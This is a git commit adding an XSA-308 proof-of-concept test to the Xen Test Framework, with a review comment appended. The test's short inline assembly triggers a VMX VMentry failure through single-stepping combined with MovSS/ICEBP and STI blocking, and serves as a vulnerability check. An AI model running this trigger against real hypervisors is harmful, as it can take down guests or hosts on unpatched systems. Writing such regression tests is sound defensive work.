From: Andrew Cooper
Date: Mon, 4 Nov 2019 18:18:14 +0000 (+0000)
Subject: XSA-308 PoC
X-Git-Url: http://xenbits.xensource.com/gitweb?a=commitdiff_plain;h=df3fbf2fc8024bd83b903f237f4154eb6dfd815f;p=xtf.git

XSA-308 PoC

Signed-off-by: Andrew Cooper
---
diff --git a/docs/all-tests.dox b/docs/all-tests.dox
index bcf9b7e..7c0b1a5 100644
--- a/docs/all-tests.dox
+++ b/docs/all-tests.dox
@@ -145,6 +145,9 @@ emulation.
 @subpage test-xsa-consoleio-write - CONSOLEIO_write stack overflow
+@subpage test-xsa-308 - VMX: VMentry failure with debug exceptions and blocked
+states.
+
 @section index-utility Utilities
diff --git a/tests/xsa-308/Makefile b/tests/xsa-308/Makefile
new file mode 100644
index 0000000..d95862c
--- /dev/null
+++ b/tests/xsa-308/Makefile
@@ -0,0 +1,9 @@
+include $(ROOT)/build/common.mk
+
+NAME := xsa-308
+CATEGORY := xsa
+TEST-ENVS := hvm64
+
+obj-perenv += main.o
+
+include $(ROOT)/build/gen.mk
diff --git a/tests/xsa-308/main.c b/tests/xsa-308/main.c
new file mode 100644
index 0000000..c673be4
--- /dev/null
+++ b/tests/xsa-308/main.c
@@ -0,0 +1,69 @@
+/**
+ * @file tests/xsa-308/main.c
+ * @ref test-xsa-308
+ *
+ * @page test-xsa-308 XSA-308
+ *
+ * Advisory: [XSA-308](https://xenbits.xen.org/xsa/advisory-308.html)
+ *
+ * The VMX VMEntry checks does not like the exact combination of state which
+ * occurs when @#DB in intercepted, Single Stepping is active, and blocked by
+ * STI/MovSS is active, despite this being a legitimate state to be in.
+ *
+ * The exact sequence is the interaction of a MovSS-deferred ICEBP @#DB while
+ * Single Stepping is active. A related sequence which tickles the same
+ * failure is an STI while Single Stepping is active.
+ *
+ * Run both of these sequences. If the VM is still alive at the end, it
+ * didn't suffer a VMEntry failure.
+ *
+ * @see tests/xsa-308/main.c
+ */
+#include
+
+const char test_title[] = "XSA-308 PoC";
+
+void __user_text movss(void)
+{
+    unsigned int tmp;
+
+    asm volatile("mov %%ss, %[tmp];"
+                 "pushf;"
+                 "pushf;"
+                 "orl $"STR(X86_EFLAGS_TF)", (%%"_ASM_SP");"
+                 "popf;"
+                 "mov %[tmp], %%ss;"
+                 ".byte 0xf1;"
+                 "1:; "_ASM_TRAP_OK(1b)
+                 "popf;"
+                 "1:; "_ASM_TRAP_OK(1b)
+                 : [tmp] "=r" (tmp));
+}
+
+void test_main(void)
+{
+    exec_user_void(movss);
+
+    asm volatile("pushf;"
+                 "pushf;"
+                 "orl $"STR(X86_EFLAGS_TF)", (%"_ASM_SP");"
+                 "popf;"
+                 "sti;"
+                 "1:; "_ASM_TRAP_OK(1b)
+                 "popf;"
+                 "1:; "_ASM_TRAP_OK(1b)
+                 "cli;");
+
+    /* If the VM is still alive, it didn't suffer a vmentry failure. */
+    xtf_success("Success: Not vulnerable to XSA-308\n");
+}
+
+/*
+ * Local variables:
+ * mode: C
+ * c-file-style: "BSD"
+ * c-basic-offset: 4
+ * tab-width: 4
+ * indent-tabs-mode: nil
+ * End:
+ */
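Review bot: Neither asm block in the new main.c says which instruction plays which role, so the MovSS-shadow/ICEBP interaction that the file header describes has to be reverse-engineered from opcodes; I would annotate `"mov %[tmp], %%ss;"` with `/* MovSS shadow: defers the pending #DB by one instruction */`, `".byte 0xf1;"` with `/* ICEBP, raised while TF is set */`, and `"sti;"` in test_main() with `/* STI-blocking variant of the same sequence */`. The `%%` versus `%` spelling in front of `_ASM_SP` differs between the two blocks because only the first asm has operands; a one-line comment on the second block would stop a later reader from "fixing" it. The header text has two slips worth correcting in the same file: `occurs when @#DB in intercepted` should read `is intercepted`, and `VMEntry checks does not like` should read `do not like`. Since, as the closing comment implies, a vulnerable hypervisor takes the guest down on VMentry failure rather than returning an error, it would help to state next to `xtf_success()` that the harness must treat a guest that never reports as the failing outcome.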